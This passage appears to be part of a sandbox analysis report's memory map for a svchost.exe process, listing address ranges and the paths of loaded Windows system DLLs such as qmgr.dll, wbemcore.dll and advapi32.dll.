= 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 795 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 796 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 797 start_va = 0xff4d0000 end_va = 0xff4dafff entry_point = 0xff4d0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 798 start_va = 0x7fee3480000 end_va = 0x7fee3551fff entry_point = 0x7fee3480000 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 799 start_va = 0x7feee780000 end_va = 0x7feee7c4fff entry_point = 0x7feee780000 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 800 start_va = 0x7fef12c0000 end_va = 0x7fef12d1fff entry_point = 0x7fef12c0000 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 801 start_va = 0x7fef12e0000 end_va = 0x7fef1321fff entry_point = 0x7fef12e0000 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 802 start_va = 0x7fef1330000 end_va = 0x7fef1349fff entry_point = 0x7fef1330000 region_type = mapped_file name = "rascfg.dll" filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll") Region: id = 803 start_va = 0x7fef2c50000 end_va = 0x7fef2c89fff entry_point = 0x7fef2c50000 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 804 start_va = 0x7fef3780000 end_va = 0x7fef378bfff entry_point = 0x7fef3780000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 805 start_va = 0x7fef4ea0000 end_va = 0x7fef4f8dfff entry_point = 0x7fef4ea0000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 806 start_va = 0x7fef5020000 end_va = 0x7fef502efff entry_point = 0x7fef5020000 region_type = mapped_file name = "qmgrprxy.dll" filename = "\\Windows\\System32\\qmgrprxy.dll" (normalized: "c:\\windows\\system32\\qmgrprxy.dll") Region: id = 807 start_va = 0x7fef5280000 end_va = 0x7fef528efff entry_point = 0x7fef5280000 region_type = mapped_file name = "ndiscapcfg.dll" filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll") Region: id = 808 start_va = 0x7fef52a0000 end_va = 0x7fef52a9fff entry_point = 0x7fef52a0000 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 809 start_va = 0x7fef5300000 end_va = 0x7fef5307fff entry_point = 0x7fef5300000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 810 start_va = 0x7fef5310000 end_va = 0x7fef5318fff entry_point = 0x7fef5310000 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 811 start_va = 0x7fef5320000 end_va = 0x7fef538afff entry_point = 0x7fef5320000 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 812 start_va = 0x7fef5390000 end_va = 0x7fef53a9fff entry_point = 0x7fef5390000 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 813 start_va = 0x7fef53b0000 end_va = 0x7fef542dfff entry_point = 0x7fef53b0000 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 814 start_va = 0x7fef5430000 end_va = 0x7fef5445fff entry_point = 0x7fef5430000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 815 start_va = 0x7fef5450000 end_va = 0x7fef550bfff entry_point = 0x7fef5450000 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 816 start_va = 0x7fef5510000 end_va = 0x7fef5593fff entry_point = 0x7fef5510000 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 817 start_va = 0x7fef55a0000 end_va = 0x7fef55b8fff entry_point = 0x7fef55a0000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 818 start_va = 0x7fef55c0000 end_va = 0x7fef560ffff entry_point = 0x7fef55c0000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 819 start_va = 0x7fef5610000 end_va = 0x7fef5617fff entry_point = 0x7fef5610000 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 820 start_va = 0x7fef5620000 end_va = 0x7fef5692fff entry_point = 0x7fef5620000 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 821 start_va = 0x7fef56a0000 end_va = 0x7fef56c5fff entry_point = 0x7fef56a0000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 822 start_va = 0x7fef56d0000 end_va = 0x7fef56f4fff entry_point = 0x7fef56d0000 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 823 start_va = 0x7fef5700000 end_va = 0x7fef573cfff entry_point = 0x7fef5700000 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 824 start_va = 0x7fef5740000 end_va = 0x7fef5753fff entry_point = 0x7fef5740000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 825 start_va = 0x7fef5760000 end_va = 0x7fef57cefff entry_point = 0x7fef5760000 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 826 start_va = 0x7fef57d0000 end_va = 0x7fef58fefff entry_point = 0x7fef57d0000 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 827 start_va = 0x7fef5900000 end_va = 0x7fef5946fff entry_point = 0x7fef5900000 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 828 start_va = 0x7fef5950000 end_va = 0x7fef5991fff entry_point = 0x7fef5950000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 829 start_va = 0x7fef59a0000 end_va = 0x7fef5a31fff entry_point = 0x7fef59a0000 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 830 start_va = 0x7fef5a40000 end_va = 0x7fef5a4efff entry_point = 0x7fef5a40000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 831 start_va = 0x7fef5a50000 end_va = 0x7fef5a76fff entry_point = 0x7fef5a50000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 832 start_va = 0x7fef5a80000 end_va = 0x7fef5b61fff entry_point = 0x7fef5a80000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 833 start_va = 0x7fef5bb0000 end_va = 0x7fef5c35fff entry_point = 0x7fef5bb0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 834 start_va = 0x7fef5c40000 end_va = 0x7fef5c7ffff entry_point = 0x7fef5c40000 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 835 start_va = 0x7fef7290000 end_va = 0x7fef72a0fff entry_point = 0x7fef7290000 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 836 start_va = 0x7fef74d0000 end_va = 0x7fef7533fff entry_point = 0x7fef74d0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 837 start_va = 0x7fef7540000 end_va = 0x7fef75b0fff entry_point = 0x7fef7540000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 838 start_va = 0x7fef7660000 end_va = 0x7fef7676fff entry_point = 0x7fef7660000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 839 start_va = 0x7fef7680000 end_va = 0x7fef782ffff entry_point = 0x7fef7680000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 840 start_va = 0x7fef7830000 end_va = 0x7fef78a3fff entry_point = 0x7fef7830000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 841 start_va = 0x7fefa650000 end_va = 0x7fefa660fff entry_point = 0x7fefa650000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 842 start_va = 0x7fefa7a0000 end_va = 0x7fefa816fff entry_point = 0x7fefa7a0000 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 843 start_va = 0x7fefa820000 end_va = 0x7fefa829fff entry_point = 0x7fefa820000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 844 start_va = 0x7fefa830000 end_va = 0x7fefa941fff entry_point = 0x7fefa830000 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 845 start_va = 0x7fefa950000 end_va = 0x7fefa95efff entry_point = 0x7fefa950000 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 846 start_va = 0x7fefa960000 end_va = 0x7fefa968fff entry_point = 0x7fefa960000 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 847 start_va = 0x7fefa970000 end_va = 0x7fefa978fff entry_point = 0x7fefa970000 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 848 start_va = 0x7fefa980000 end_va = 0x7fefa9d5fff entry_point = 0x7fefa980000 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 849 start_va = 0x7fefa9e0000 end_va = 0x7fefaa3dfff entry_point = 0x7fefa9e0000 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 850 start_va = 0x7fefaa40000 end_va = 0x7fefaa57fff entry_point = 0x7fefaa40000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 851 start_va = 0x7fefaa60000 end_va = 0x7fefaa70fff entry_point = 0x7fefaa60000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 852 start_va = 0x7fefaa90000 end_va = 0x7fefaae2fff entry_point = 0x7fefaa90000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 853 start_va = 0x7fefabe0000 end_va = 0x7fefabeafff entry_point = 0x7fefabe0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 854 start_va = 0x7fefabf0000 end_va = 0x7fefac16fff entry_point = 0x7fefabf0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 855 start_va = 0x7fefac40000 end_va = 0x7fefac53fff entry_point = 0x7fefac40000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 856 start_va = 0x7fefac60000 end_va = 0x7fefacc6fff entry_point = 0x7fefac60000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 857 start_va = 0x7fefacd0000 end_va = 0x7fefacdafff entry_point = 0x7fefacd0000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 858 start_va = 0x7feface0000 end_va = 0x7fefacebfff entry_point = 0x7feface0000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 859 start_va = 0x7fefacf0000 end_va = 0x7fefacfffff entry_point = 0x7fefacf0000 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 860 start_va = 0x7fefad00000 end_va = 0x7fefad18fff entry_point = 0x7fefad00000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 861 start_va = 0x7fefad20000 end_va = 0x7fefad56fff entry_point = 0x7fefad20000 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 862 start_va = 0x7fefad60000 end_va = 0x7fefad74fff entry_point = 0x7fefad60000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 863 start_va = 0x7fefad80000 end_va = 0x7fefae41fff entry_point = 0x7fefad80000 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 864 start_va = 0x7fefb0a0000 end_va = 0x7fefb0bcfff entry_point = 0x7fefb0a0000 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 865 start_va = 0x7fefb0c0000 end_va = 0x7fefb0c8fff entry_point = 0x7fefb0c0000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 866 start_va = 0x7fefb1b0000 end_va = 0x7fefb1dcfff entry_point = 0x7fefb1b0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 867 start_va = 0x7fefb1e0000 end_va = 0x7fefb1f3fff entry_point = 0x7fefb1e0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 868 start_va = 0x7fefb200000 end_va = 0x7fefb214fff entry_point = 0x7fefb200000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 869 start_va = 0x7fefb220000 end_va = 0x7fefb22bfff entry_point = 0x7fefb220000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 870 start_va = 0x7fefb230000 end_va = 0x7fefb245fff entry_point = 0x7fefb230000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 871 start_va = 0x7fefb360000 end_va = 0x7fefb370fff entry_point = 0x7fefb360000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 872 start_va = 0x7fefb4c0000 end_va = 0x7fefb4f4fff entry_point = 0x7fefb4c0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 873 start_va = 0x7fefb930000 end_va = 0x7fefb985fff entry_point = 0x7fefb930000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 874 start_va = 0x7fefb990000 end_va = 0x7fefbabbfff entry_point = 0x7fefb990000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 875 start_va = 0x7fefbac0000 end_va = 0x7fefbadcfff entry_point = 0x7fefbac0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 876 start_va = 0x7fefbb10000 end_va = 0x7fefbd03fff entry_point = 0x7fefbb10000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 877 start_va = 0x7fefc1a0000 end_va = 0x7fefc1abfff entry_point = 0x7fefc1a0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 878 start_va = 0x7fefc1b0000 end_va = 0x7fefc26afff entry_point = 0x7fefc1b0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 879 start_va = 0x7fefc270000 end_va = 0x7fefc276fff entry_point = 0x7fefc270000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 880 start_va = 0x7fefc360000 end_va = 0x7fefc37afff entry_point = 0x7fefc360000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 881 start_va = 0x7fefc380000 end_va = 0x7fefc39dfff entry_point = 0x7fefc380000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 882 start_va = 0x7fefc3a0000 end_va = 0x7fefc3b1fff entry_point = 0x7fefc3a0000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 883 start_va = 0x7fefc3c0000 end_va = 0x7fefc3defff entry_point = 0x7fefc3c0000 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 884 start_va = 0x7fefc490000 end_va = 0x7fefc4c8fff entry_point = 0x7fefc490000 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 885 start_va = 0x7fefc4d0000 end_va = 0x7fefc4d9fff entry_point = 0x7fefc4d0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 886 start_va = 0x7fefc4e0000 end_va = 0x7fefc4ecfff entry_point = 0x7fefc4e0000 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 887 start_va = 0x7fefc5d0000 end_va = 0x7fefc616fff entry_point = 0x7fefc5d0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 888 start_va = 0x7fefc6c0000 end_va = 0x7fefc6effff entry_point = 0x7fefc6c0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 889 start_va = 0x7fefc6f0000 end_va = 0x7fefc74afff entry_point = 0x7fefc6f0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 890 start_va = 0x7fefc860000 end_va = 0x7fefc866fff entry_point = 0x7fefc860000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 891 start_va = 0x7fefc870000 end_va = 0x7fefc8c4fff entry_point = 0x7fefc870000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 892 start_va = 0x7fefc8d0000 end_va = 0x7fefc8e6fff entry_point = 0x7fefc8d0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 893 start_va = 0x7fefc9e0000 end_va = 0x7fefca11fff entry_point = 0x7fefc9e0000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 894 start_va = 0x7fefca30000 end_va = 0x7fefca39fff entry_point = 0x7fefca30000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 895 start_va = 0x7fefcac0000 end_va = 0x7fefcaeefff entry_point = 0x7fefcac0000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 896 start_va = 0x7fefcb00000 end_va = 0x7fefcb6cfff entry_point = 0x7fefcb00000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 897 start_va = 0x7fefcb70000 end_va = 0x7fefcb83fff entry_point = 0x7fefcb70000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 898 start_va = 0x7fefcdd0000 end_va = 0x7fefcdf2fff entry_point = 0x7fefcdd0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 899 start_va = 0x7fefce70000 end_va = 0x7fefce7afff entry_point = 0x7fefce70000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 900 start_va = 0x7fefcea0000 end_va = 0x7fefcec4fff entry_point = 0x7fefcea0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 901 start_va = 0x7fefced0000 end_va = 0x7fefcedefff entry_point = 0x7fefced0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 902 start_va = 0x7fefcee0000 end_va = 0x7fefcf70fff entry_point = 0x7fefcee0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 903 start_va = 0x7fefcf80000 end_va = 0x7fefcfbcfff entry_point = 0x7fefcf80000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 904 start_va = 0x7fefcfc0000 end_va = 0x7fefcfd3fff entry_point = 0x7fefcfc0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 905 start_va = 0x7fefcfe0000 end_va = 0x7fefcfeefff entry_point = 0x7fefcfe0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 906 start_va = 0x7fefd080000 end_va = 0x7fefd08efff entry_point = 0x7fefd080000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 907 start_va = 0x7fefd130000 end_va = 0x7fefd169fff entry_point = 0x7fefd130000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 908 start_va = 0x7fefd170000 end_va = 0x7fefd2d6fff entry_point = 0x7fefd170000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 909 start_va = 0x7fefd2e0000 end_va = 0x7fefd315fff entry_point = 0x7fefd2e0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 910 start_va = 0x7fefd320000 end_va = 0x7fefd38afff entry_point = 0x7fefd320000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 911 start_va = 0x7fefd390000 end_va = 0x7fefd3a9fff entry_point = 0x7fefd390000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 912 start_va = 0x7fefd3b0000 end_va = 0x7fefd48afff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 913 start_va = 0x7fefd490000 end_va = 0x7fefd49dfff entry_point = 0x7fefd490000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 914 start_va = 0x7fefd4a0000 end_va = 0x7fefd568fff entry_point = 0x7fefd4a0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 915 start_va = 0x7fefd570000 end_va = 0x7fefe2f7fff entry_point 